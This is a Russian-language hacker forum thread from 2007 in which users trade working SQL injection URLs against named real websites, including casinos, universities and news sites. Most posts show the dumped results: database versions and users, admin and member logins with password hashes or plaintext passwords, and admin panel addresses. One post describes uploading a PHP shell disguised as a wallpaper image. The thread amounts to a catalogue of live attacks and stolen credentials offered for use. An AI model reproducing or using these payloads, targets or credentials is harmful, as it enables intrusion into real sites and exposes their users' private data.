SQL Инъекции

SWAT · 25 Dec 2007

Code:

http://ballshooter.com/games/?c=category&category=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+partners/*

Code:

http://www.tctux.com/php/showContent.php?linkid=-6+union+select+VERSION()/*

Code:

http://www.7casinoonline.com/it/poker.php?ID=-1682+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*

Code:

http://www.jeu-casino-online.com/poker.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

4Dfx · 25 Dec 2007

http://www.big6.com/

http://www.big6.com/showarticle.php?id=-1+union+select+1,2,3,4,5/*
Click to expand...

poll_user:
user_id
username
userpass
session
last_visit

http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(%20user_id,%20CHAR(32,58,32),%20username,%20CHAR(32,58,32),%20userpass),2,3,4,5+from+poll_user/*
Click to expand...

Админка http://www.big6.com/admin/
admin : d158b1d234953b66bfc119f17f800b7b
wp_users:
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name

http://www.big6.com/showarticle.php?id=-1+union+select+CONCAT(ID,%20CHAR(32,58,32),user_login,%20CHAR(32,58,32),user_pass,%20CHAR(32,58,32),%20user_email),2,3,4,5+from+wp_users/*
Click to expand...

http://www.big6.com/blog/wp-login.php
admin : c49938ea11089d6a7783a28469b64edf
sue : e7e9ec3723447a642f762b2b6a15cfd7
laura : 73bc892f0b1ea86bf8e39656ad1e0d26
mike : bfd9f0cc586164634e1b9a255069ca5f
carrie : 2ccf2e8d12b57c2b2a58af053033dcd0
theresa : 85fb5505ee3d6f3976a00cb248822d38

otmorozok428 · 25 Dec 2007

www.100baz.ru
Code:
http://www.100baz.ru/info.php?id=54+AND+23%3d(SELECT+COUNT(table_name)+FROM+information_schema.tables)
Количество таблиц в базе (вместе со служебными таблицами information_schema.tables) - 23.
Юзерские таблицы:
bag
client
region
rubrika
t_news
tovar

JIyka · 25 Dec 2007

Usera не подобрал passass1234

http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+users/*

fRg · 25 Dec 2007

Если цензура будет не очень строгой, то будет видео по Франции

А пока...

artslivres.com
Code:
http://artslivres.com/ShowArticles.php?TypeAffichage=ParEditeur&NEdition=35&Editeur=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.0.25-standard-log:artslivres001:[email protected]

etgarim.co.il - кто знает иврит - копайте глубже!
Code:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),3,4,5/*&type=game
4.1.11-standard:etgarim_db:etgarim_user@localhost

Юзеры:
Code:
http://www.etgarim.co.il/showSection.php?id=-1+union+select+1,convert(concat_ws(0x3a,username,password,email)+using+latin1),3,4,5+from+users+limit+0,1/*&type=game

~EviL~ · 25 Dec 2007

HTML:

http://www.politcom.ru/article.php?id=-5492+UNION+SELECT+concat(user(),0x3a,database(),0x3a,version())/*

[email protected]:W_POLIT:4.1.20-1.GMS

2 JIyka

HTML:

http://www.lilstructuraldesign.ro/work.php?id=-1+union+select+1,2,3,4,5,concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+users/*

1:amro:b4af804009cb036a4ccdc33431ef9ac9

fRg · 25 Dec 2007

cavi.dk
Code:
http://www.cavi.dk/showarticle.php?id=-1/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),4,5,6/*&newsletter_id=8
4.1.18:cavi_nyhedsbrev:cavidb@localhost
с фильтрами постарались...

studyport.info
Code:
http://studyport.info/viewdetails.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
4.1.22-log : portua_studybank : portua_studybank@apollo

iwsf.com - International Water Ski Federation
Code:
http://www.iwsf.com/dbheadlines/showarticle.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*
4.0.27-standard-log:db204576552:[email protected]

urummage.com
Code:
http://www.urummage.com/articles/showarticle.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())/*
4.1.22-standard-log:urummag_urummag:[email protected]

Roba · 25 Dec 2007

Вот и от меня немного...
www.maxnormal.tv
Code:
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6+from+%20%20users+limit+0,1+--+
4.1.11-Debian_4sarge7:[email protected]:africandope_co_za_-_waddy
Code:
http://www.maxnormal.tv/magazine.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),4,5,6+from+users+limit+0,1+--+
matt : 1a1dc91c907325c69271ddf0c944bc72 : pass
www.deltarescue.tv
Code:
http://www.deltarescue.tv/deltarescue/war/item.php?id=-1+union+select+version(),2,3,4,5,6,7+--+
4.0.24_Debian-10sarge2-log:deltarescue@localhost:deltarescue
www.llbn.tv
Code:
http://www.llbn.tv/index.php?option=com_na_content&task=view&id=55-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
4.1.10a-Max:hzhnkrhe@localhost:llbn-netadventist-org
www.canallatino.tv
Code:
http://www.canallatino.tv/x2/index.php?id=2&seccion=3&noticia=1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16+--+
.1.15-Debian_1-log:new_users@localhost:new_users'>.1.15-Debian_1-log:new_users@localhost:n...
www.music.indiana.edu
Code:
http://www.music.indiana.edu/apps/prelude/new/index.php?id=4495'+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
5.0.22:sitevisitor@localhost:musevents
www.stnersess.edu
Code:
http://www.stnersess.edu/schoolFacultyInfo/alumni/details.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+
4.0.27-standard:stnerses_db@localhost:stnerses_db
ieee.metu.edu
Code:
http://ieee.metu.edu/alaattin/v2/detay.php?catid=9&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3,4,5,6,7+--+
4.1.11-Debian_4sarge7:alaattin@localhost:alaattindb

n0ne · 25 Dec 2007

zebratelecom.com

http://www.zebratelecom.com/private/news.php?id=244&prn=-3684+union+select+1/*
Click to expand...

test@localhost::4.1.20::zebra_private2007

Та же фигня и на zebra.ru, и на zebratelecom.ru, короче на всех зеркалах.

~EviL~ · 25 Dec 2007

HTML:
http://www.domkino.spb.ru/description.php?id=-572+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(user(),0x3a,database(),0x3a,version()),11,12/*
[email protected]:domkinospbru:4.1.21-log
HTML:
http://www.domkino.spb.ru/description.php?id=-572+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(name,0x3a,password,0x3a,email),11,12+FROM+user+LIMIT+0,1/*
Шурик:ahin:[email protected]
Андрей:andrey:[email protected]
Sergh:ss:[email protected]
Джек-потрошитель:jack:[email protected]

sasTO · 25 Dec 2007

Довольно крупный сайт...

код:

http://www.zavarka.com/texts/cgi-bin/show.cgi?id=-381+union+select+1,2,3,4,5,6,7,8/*&p=0

жаль 4 мускул

p.s тоже самое на зеркале в домене ru

159932 · 25 Dec 2007

www.transfermarketweb.com

http://www.transfermarketweb.com/?action=read&idsel=-8190+union+select+1,2,3,4,convert(concat(user,0x3a,password),binary),6,7,8,9,0,1,2,3,4+from+mysql.user/*
Click to expand...

root:681a9db507f25aea:my22lu75
http://www.transfermarketweb.com/admin/

Maxyks · 25 Dec 2007

fobofob said:

Довольно крупный сайт...

код:

http://www.zavarka.com/texts/cgi-bin/show.cgi?id=-381+union+select+1,2,3,4,5,6,7,8/*&p=0

жаль 4 мускул

p.s тоже самое на зеркале в домене ru
Click to expand...

на сайте есть скрипт аплоада "валлпаперов" , щас линк не могу дать так как сайт не грузит =\ аплоадим значит нашу "картинку"... нам напишет что-то вроде - "после проверки администратором ваша картинка будет размещена на сайте"... мы же не будем ждать этого, а сразу перейдем к нашей пикче, благо директории открыты для просмотра :
Code:
[COLOR=Black]http://www.zavarka.ru/wallpapers/data/New/606426_jpe9.php[/COLOR]

.Begemot. · 25 Dec 2007

glasmaher.com
HTML:
http://www.glasmaher.com/index.php?id=999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/*&lang=si
USER:gmaher_optika@localhost
VERSION:4.1.15-standard-log
DATABASE:gmaher_glasmaher

Есть таблица admin и столбец id.
HTML:
http://www.glasmaher.com/index.php?id=999+union+select+0,concat(id),2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin/*&lang=si
Админка
HTML:
http://www.glasmaher.com/admin/

159932 · 25 Dec 2007

www.thehaus.ez-net.com

http://thehaus.ez-net.com/index.php?ent=5321+union+select+1,2,3,4,5,6,convert(passwd,binary)+from+admins/*
Click to expand...

~EviL~ · 26 Dec 2007

HTML:

http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7/*

hrman@localhost:hrani:5.0.45

HTML:

http://www.hranite.info/theory.php?pid=-25+UNION+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+FROM+users+LIMIT+0,1/*

admin:0fbd3cb40a66bda2bb951eb88e4bf460:[email protected]::franzela

Saint-Sky · 26 Dec 2007

http://www.ns.ui.edu
Code:
http://www.ns.ui.edu/mipa/wap/?view=berita&id=-1'+UNION+SELECT+1,2,convert(user()+USING+latin1),4,5,6/*
wwwns@localhost:wwwns:4.1.11

S1ash · 26 Dec 2007

вот что получилось... скудненько, но всё же
Code:
http://cards.udaff.com/viewcat.php?id=-1+UNION+SELECT+database(),version(),user(),database(),version()/*

x88x · 26 Dec 2007

ну я тож, дабы не отставать выкладываю:

QSRWEB.COM
Code:
http://www.qsrweb.com/research.php?rc_id=16+union+select+USER(),2,3,4,5,6,7,8,9
atmmarketplace@localhost

из таблиц нашел только members...

fRg · 26 Dec 2007

askort.com
Code:
http://www.askort.com/?item_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4/*
4.1.11:maxivanov_askort:maxivanov_askort@localhost

newuniversity.org - University of California
Code:
http://www.newuniversity.org/checkDB.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
5.37-standard-log:newunive_NewU:newunive_newu@localhost

latestchess.com - Шахматы - сила!
Code:
http://latestchess.com/showArticle.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/*
4.0.16:lciin000_lc:lciin000_lc@localhost

vcharkarn.com - что-то индийское походу...
Code:
http://www.vcharkarn.com/include/article/showarticle.php?aid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
5.0.22:db17937a:us17937a@localhost

Из таблиц кое-чего:
Code:
administrator
contact_list
email_confirm
exam_users_ID
member_info
В табе administrator есть поля:
Code:
admin_id,login,password

SQL Инъекции

SWAT Elder - Старейшина

4Dfx Banned

otmorozok428 Banned

JIyka Member

fRg Active Member

~EviL~ Elder - Старейшина

fRg Active Member

Roba Banned

n0ne Elder - Старейшина

~EviL~ Elder - Старейшина

sasTO Banned

159932 Elder - Старейшина

Maxyks Banned

.Begemot. Elder - Старейшина

159932 Elder - Старейшина

~EviL~ Elder - Старейшина

Saint-Sky Elder - Старейшина

S1ash Banned

x88x Elder - Старейшина

fRg Active Member

Useful Searches

SQL Инъекции

SWAT Elder - Старейшина

4Dfx Banned

otmorozok428 Banned

JIyka Member

fRg Active Member

~EviL~ Elder - Старейшина

fRg Active Member

Roba Banned

n0ne Elder - Старейшина

~EviL~ Elder - Старейшина

sasTO Banned

159932 Elder - Старейшина

Maxyks Banned

.Begemot. Elder - Старейшина

159932 Elder - Старейшина

~EviL~ Elder - Старейшина

Saint-Sky Elder - Старейшина

S1ash Banned

x88x Elder - Старейшина

fRg Active Member